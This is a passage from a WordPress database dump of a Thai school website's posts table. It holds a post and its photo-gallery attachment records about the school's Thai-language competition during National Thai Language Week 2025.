{\"id\":1840,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871414_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1840\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1842,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871415_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1842\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1843,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871416_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1843\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1845,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871417_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1845\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1846,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871418_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1846\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1844,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871419_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1844\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1847,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871379_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1847\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1848,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871388_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1848\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->','รักษ์ภาษาไทย เนื่องในสัปดาห์วันภาษาไทย แห่งชาติ ปี 2568','','publish','closed','closed','','%e0%b8%a3%e0%b8%b1%e0%b8%81%e0%b8%a9%e0%b9%8c%e0%b8%a0%e0%b8%b2%e0%b8%a9%e0%b8%b2%e0%b9%84%e0%b8%97%e0%b8%a2-%e0%b9%80%e0%b8%99%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b9%83%e0%b8%99%e0%b8%aa%e0%b8%b1','','','2025-07-09 10:17:57','2025-07-09 03:17:57','',0,'http://pakhaeng.ssk.in.th/?p=1804',0,'post','',0),
(1805,1,'2025-07-09 10:16:36','2025-07-09 03:16:36','','LINE_ALBUM_ศิลปหัตถกรรม_250709_3','','inherit','','closed','','line_album_%e0%b8%a8%e0%b8%b4%e0%b8%a5%e0%b8%9b%e0%b8%ab%e0%b8%b1%e0%b8%95%e0%b8%96%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1_250709_3','','','2025-07-09 10:16:36','2025-07-09 03:16:36','',1804,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_ศิลปหัตถกรรม_250709_3.jpg',0,'attachment','image/jpeg',0),
(1806,1,'2025-07-09 10:16:36','2025-07-09 03:16:36','','LINE_ALBUM_ศิลปหัตถกรรม_250709_5','','inherit','','closed','','line_album_%e0%b8%a8%e0%b8%b4%e0%b8%a5%e0%b8%9b%e0%b8%ab%e0%b8%b1%e0%b8%95%e0%b8%96%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1_250709_5','','','2025-07-09 10:16:36','2025-07-09 03:16:36','',1804,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_ศิลปหัตถกรรม_250709_5.jpg',0,'attachment','image/jpeg',0),
(1807,1,'2025-07-09 10:16:36','2025-07-09 03:16:36','','LINE_ALBUM_ศิลปหัตถกรรม_250709_1','','inherit','','closed','','line_album_%e0%b8%a8%e0%b8%b4%e0%b8%a5%e0%b8%9b%e0%b8%ab%e0%b8%b1%e0%b8%95%e0%b8%96%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1_250709_1','','','2025-07-09 10:16:36','2025-07-09 03:16:36','',1804,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_ศิลปหัตถกรรม_250709_1.jpg',0,'attachment','image/jpeg',0),
(1808,1,'2025-07-09 10:16:36','2025-07-09 03:16:36','','S__9871454_0','','inherit','','closed','','s__9871454_0','','','2025-07-09 10:16:36','2025-07-09 03:16:36','',1804,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871454_0.jpg',0,'attachment','image/jpeg',0),
(1809,1,'2025-07-09 10:16:37','2025-07-09 03:16:37','','LINE_ALBUM_ศิลปหัตถกรรม_250709_4','','inherit','','closed','','line_album_%e0%b8%a8%e0%b8%b4%e0%b8%a5%e0%b8%9b%e0%b8%ab%e0%b8%b1%e0%b8%95%e0%b8%96%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1_250709_4','','','2025-07-09 10:16:37','2025-07-09 03:16:37','',1804,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_ศิลปหัตถกรรม_250709_4.jpg',0,'attachment','image/jpeg',0),
(1810,1,'2025-07-09 10:16:37','2025-07-09 03:16:37','','LINE_ALBUM_ศิลปหัตถกรรม_250709_2','','inherit','','closed','','line_album_%e0%b8%a8%e0%b8%b4%e0%b8%a5%e0%b8%9b%e0%b8%ab%e0%b8%b1%e0%b8%95%e0%b8%96%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1_250709_2','','','2025-07-09 10:16:37','2025-07-09 03:16:37','',1804,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_ศิลปหัตถกรรม_250709_2.jpg',0,'attachment','image/jpeg',0),
(1811,1,'2025-07-09 10:16:40','2025-07-09 03:16:40','','S__9871447_0','','inherit','','closed','','s__9871447_0','','','2025-07-09 10:16:40','2025-07-09 03:16:40','',1804,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871447_0.jpg',0,'attachment','image/jpeg',0),
(1812,1,'2025-07-09 10:16:40','2025-07-09 03:16:40','','S__9871445_0','','inherit','','closed','','s__9871445_0','','','2025-07-09 10:16:40','2025-07-09 03:16:40','',1804,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871445_0.jpg',0,'attachment','image/jpeg',0),
(1813,1,'2025-07-09 10:16:41','2025-07-09 03:16:41','','S__9871448_0','','inherit','','closed','','s__9871448_0','','','2025-07-09 10:16:41','2025-07-09 03:16:41','',1804,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871448_0.jpg',0,'attachment','image/jpeg',0),
(1814,1,'2025-07-09 10:16:41','2025-07-09 03:16:41','','S__9871449_0','','inherit','','closed','','s__9871449_0','','','2025-07-09 10:16:41','2025-07-09 03:16:41','',1804,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871449_0.jpg',0,'attachment','image/jpeg',0),
(1815,1,'2025-07-09 10:16:41','2025-07-09 03:16:41','','S__9871450_0','','inherit','','closed','','s__9871450_0','','','2025-07-09 10:16:41','2025-07-09 03:16:41','',1804,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871450_0.jpg',0,'attachment','image/jpeg',0),
(1816,1,'2025-07-09 10:16:41','2025-07-09 03:16:41','','S__9871455_0','','inherit','','closed','','s__9871455_0','','','2025-07-09 10:16:41','2025-07-09 03:16:41','',1804,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871455_0.jpg',0,'attachment','image/jpeg',0),
(1817,1,'2025-07-09 10:16:44','2025-07-09 03:16:44','','S__9871452_0','','inherit','','closed','','s__9871452_0','','','2025-07-09 10:16:44','2025-07-09 03:16:44','',1804,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871452_0.jpg',0,'attachment','image/jpeg',0),
(1818,1,'2025-07-09 10:16:44','2025-07-09 03:16:44','','S__9871394_0','','inherit','','closed','','s__9871394_0','','','2025-07-09 10:16:44','2025-07-09 03:16:44','',1804,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871394_0.jpg',0,'attachment','image/jpeg',0),
(1819,1,'2025-07-09 10:16:45','2025-07-09 03:16:45','','S__9871451_0','','inherit','','closed','','s__9871451_0','','','2025-07-09 10:16:45','2025-07-09 03:16:45','',1804,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871451_0.jpg',0,'attachment','image/jpeg',0),
(1820,1,'2025-07-09 10:16:45','2025-07-09 03:16:45','','S__9871453_0','','inherit','','closed','','s__9871453_0','','','2025-07-09 10:16:45','2025-07-09 03:16:45','',1804,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871453_0.jpg',0,'attachment','image/jpeg',0),
(1821,1,'2025-07-09 10:16:45','2025-07-09 03:16:45','','S__9871393_0','','inherit','','closed','','s__9871393_0','','','2025-07-09 10:16:45','2025-07-09 03:16:45','',1804,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871393_0.jpg',0,'attachment','image/jpeg',0),
(1822,1,'2025-07-09 10:16:45','2025-07-09 03:16:45','','S__9871391_0','','inherit','','closed','','s__9871391_0','','','2025-07-09 10:16:45','2025-07-09 03:16:45','',1804,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871391_0.jpg',0,'attachment','image/jpeg',0),
(1823,1,'2025-07-09 10:16:47','2025-07-09 03:16:47','','S__9871396_0','','inherit','','closed','','s__9871396_0','','','2025-07-09 10:16:47','2025-07-09 03:16:47','',1804,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871396_0.jpg',0,'attachment','image/jpeg',0),
(1824,1,'2025-07-09 10:16:48','2025-07-09 03:16:48','','S__9871397_0','','inherit','','closed','','s__9871397_0','','','2025-07-09 10:16:48','2025-07-09 03:16:48','',1804,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871397_0.jpg',0,'attachment','image/jpeg',0),
(1825,1,'2025-07-09 10:16:48','2025-07-09 03:16:48','','S__9871398_0','','inherit','','closed','','s__9871398_0','','','2025-07-09 10:16:48','2025-07-09 03:16:48','',1804,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871398_0.jpg',0,'attachment','image/jpeg',0),
(1826,1,'2025-07-09 10:16:48','2025-07-09 03:16:48','','S__9871400_0','','inherit','','closed','','s__9871400_0','','','2025-07-09 10:16:48','2025-07-09 03:16:48','',1804,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871400_0.jpg',0,'attachment','image/jpeg',0),
(1827,1,'2025-07-09 10:16:49','2025-07-09 03:16:49','','S__9871395_0','','inherit','','closed','','s__9871395_0','','','2025-07-09 10:16:49','2025-07-09 03:16:49','',1804,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871395_0.jpg',0,'attachment','image/jpeg',0),
(1828,1,'2025-07-09 10:16:49','2025-07-09 03:16:49','','S__9871401_0','','inherit','','closed','','s__9871401_0','','','2025-07-09 10:16:49','2025-07-09 03:16:49','',1804,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871401_0.jpg',0,'attachment','image/jpeg',0),
(1829,1,'2025-07-09 10:16:50','2025-07-09 03:16:50','','S__9871399_0','','inherit','','closed','','s__9871399_0','','','2025-07-09 10:16:50','2025-07-09 03:16:50','',1804,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871399_0.jpg',0,'attachment','image/jpeg',0),
(1830,1,'2025-07-09 10:16:51','2025-07-09 03:16:51','','S__9871420_0','','inherit','','closed','','s__9871420_0','','','2025-07-09 10:16:51','2025-07-09 03:16:51','',1804,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871420_0.jpg',0,'attachment','image/jpeg',0),
(1831,1,'2025-07-09 10:16:52','2025-07-09 03:16:52','','S__9871374_0','','inherit','','closed','','s__9871374_0','','','2025-07-09 10:16:52','2025-07-09 03:16:52','',1804,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871374_0.jpg',0,'attachment','image/jpeg',0),
(1832,1,'2025-07-09 10:16:52','2025-07-09 03:16:52','','S__9871387_0','','inherit','','closed','','s__9871387_0','','','2025-07-09 10:16:52','2025-07-09 03:16:52','',1804,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871387_0.jpg',0,'attachment','image/jpeg',0),
(1833,1,'2025-07-09 10:16:53','2025-07-09 03:16:53','','S__9871376_0','','inherit','','closed','','s__9871376_0','','','2025-07-09 10:16:53','2025-07-09 03:16:53','',1804,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871376_0.jpg',0,'attachment','image/jpeg',0),
(1834,1,'2025-07-09 10:16:53','2025-07-09 03:16:53','','S__9871389_0','','inherit','','closed','','s__9871389_0','','','2025-07-09 10:16:53','2025-07-09 03:16:53','',1804,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871389_0.jpg',0,'attachment','image/jpeg',0),
(1835,1,'2025-07-09 10:16:53','2025-07-09 03:16:53','','S__9871390_0','','inherit','','closed','','s__9871390_0','','','2025-07-09 10:16:53','2025-07-09 03:16:53','',1804,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871390_0.jpg',0,'attachment','image/jpeg',0),
(1836,1,'2025-07-09 10:16:54','2025-07-09 03:16:54','','S__9871409_0','','inherit','','closed','','s__9871409_0','','','2025-07-09 10:16:54','2025-07-09 03:16:54','',1804,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871409_0.jpg',0,'attachment','image/jpeg',0),
(1837,1,'2025-07-09 10:16:55','2025-07-09 03:16:55','','S__9871411_0','','inherit','','closed','','s__9871411_0','','','2025-07-09 10:16:55','2025-07-09 03:16:55','',1804,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871411_0.jpg',0,'attachment','image/jpeg',0),
(1838,1,'2025-07-09 10:16:56','2025-07-09 03:16:56','','S__9871410_0','','inherit','','closed','','s__9871410_0','','','2025-07-09 10:16:56','2025-07-09 03:16:56','',1804,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871410_0.jpg',0,'attachment','image/jpeg',0),
(1839,1,'2025-07-09 10:16:56','2025-07-09 03:16:56','','S__9871412_0','','inherit','','closed','','s__9871412_0','','','2025-07-09 10:16:56','2025-07-09 03:16:56','',1804,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871412_0.jpg',0,'attachment','image/jpeg',0),
(1840,1,'2025-07-09 10:16:57','2025-07-09 03:16:57','','S__9871414_0','','inherit','','closed','','s__9871414_0','','','2025-07-09 10:16:57','2025-07-09 03:16:57','',1804,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871414_0.jpg',0,'attachment','image/jpeg',0),
(1841,1,'2025-07-09 10:16:57','2025-07-09 03:16:57','','S__9871413_0','','inherit','','closed','','s__9871413_0','','','2025-07-09 10:16:57','2025-07-09 03:16:57','',1804,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871413_0.jpg',0,'attachment','image/jpeg',0),
(1842,1,'2025-07-09 10:16:58','2025-07-09 03:16:58','','S__9871415_0','','inherit','','closed','','s__9871415_0','','','2025-07-09 10:16:58','2025-07-09 03:16:58','',1804,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871415_0.jpg',0,'attachment','image/jpeg',0),
(1843,1,'2025-07-09 10:16:58','2025-07-09 03:16:58','','S__9871416_0','','inherit','','closed','','s__9871416_0','','','2025-07-09 10:16:58','2025-07-09 03:16:58','',1804,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871416_0.jpg',0,'attachment','image/jpeg',0),
(1844,1,'2025-07-09 10:17:00','2025-07-09 03:17:00','','S__9871419_0','','inherit','','closed','','s__9871419_0','','','2025-07-09 10:17:00','2025-07-09 03:17:00','',1804,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871419_0.jpg',0,'attachment','image/jpeg',0),
(1845,1,'2025-07-09 10:17:00','2025-07-09 03:17:00','','S__9871417_0','','inherit','','closed','','s__9871417_0','','','2025-07-09 10:17:00','2025-07-09 03:17:00','',1804,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871417_0.jpg',0,'attachment','image/jpeg',0),
(1846,1,'2025-07-09 10:17:00','2025-07-09 03:17:00','','S__9871418_0','','inherit','','closed','','s__9871418_0','','','2025-07-09 10:17:00','2025-07-09 03:17:00','',1804,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871418_0.jpg',0,'attachment','image/jpeg',0),
(1847,1,'2025-07-09 10:17:00','2025-07-09 03:17:00','','S__9871379_0','','inherit','','closed','','s__9871379_0','','','2025-07-09 10:17:00','2025-07-09 03:17:00','',1804,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871379_0.jpg',0,'attachment','image/jpeg',0),
(1848,1,'2025-07-09 10:17:01','2025-07-09 03:17:01','','S__9871388_0','','inherit','','closed','','s__9871388_0','','','2025-07-09 10:17:01','2025-07-09 03:17:01','',1804,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871388_0.jpg',0,'attachment','image/jpeg',0),
(1849,1,'2025-07-09 10:17:29','2025-07-09 03:17:29','','LINE_ALBUM_ศิลปหัตถกรรม_250709_5','','inherit','','closed','','line_album_%e0%b8%a8%e0%b8%b4%e0%b8%a5%e0%b8%9b%e0%b8%ab%e0%b8%b1%e0%b8%95%e0%b8%96%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1_250709_5-2','','','2025-07-09 10:17:29','2025-07-09 03:17:29','',1804,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_ศิลปหัตถกรรม_250709_5-1.jpg',0,'attachment','image/jpeg',0),
(1850,1,'2025-07-09 10:17:55','2025-07-09 03:17:55','<!-- wp:paragraph -->\n<p>วันที่ 8 กรกฎาคม พ.ศ.2568 โรงเรียนบ้านหนองปลาเข็ง-กอไหล่ เข้าร่วมการแข่งขันโครงการรักษ์ภาษาไทย เนื่องในสัปดาห์วันภาษาไทยแห่งชาติ ประจำปี 2568 ของกลุ่ม CEO ประจิมโนนคูณ การแข่งขันในครั้งนี้ จัด ณ โรงเรียนบ้านหนองปลาเข็ง กอไหล่ มีกิจกรรมการแข่งขันทั้งหมด 4 รายการ ได้แก่ คัดลายมือ , การเขียนเรื่องจากภาพ , การเขียนเรียงความ , การแต่งคำประพันธ์</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":1806,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_ศิลปหัตถกรรม_250709_5-1024x768.jpg\" alt=\"\" class=\"wp-image-1806\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1809,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_ศิลปหัตถกรรม_250709_4-1024x768.jpg\" alt=\"\" class=\"wp-image-1809\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1805,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_ศิลปหัตถกรรม_250709_3-1024x768.jpg\" alt=\"\" class=\"wp-image-1805\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1810,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_ศิลปหัตถกรรม_250709_2-1024x768.jpg\" alt=\"\" class=\"wp-image-1810\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1807,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_ศิลปหัตถกรรม_250709_1-1024x768.jpg\" alt=\"\" class=\"wp-image-1807\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1808,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871454_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1808\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1816,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871455_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1816\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1812,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871445_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1812\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1811,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871447_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1811\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1813,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871448_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1813\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1814,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871449_0-768x1024.jpg\" alt=\"\" class=\"wp-image-1814\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1815,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871450_0-768x1024.jpg\" alt=\"\" class=\"wp-image-1815\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1819,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871451_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1819\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1817,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871452_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1817\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1820,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871453_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1820\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1818,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871394_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1818\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1822,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871391_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1822\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1821,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871393_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1821\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1823,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871396_0-768x1024.jpg\" alt=\"\" class=\"wp-image-1823\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1824,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871397_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1824\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1827,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871395_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1827\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1825,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871398_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1825\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1826,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871400_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1826\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1828,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871401_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1828\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1829,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871399_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1829\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1830,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871420_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1830\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1831,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871374_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1831\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1833,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871376_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1833\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1832,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871387_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1832\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1834,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871389_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1834\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1835,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure 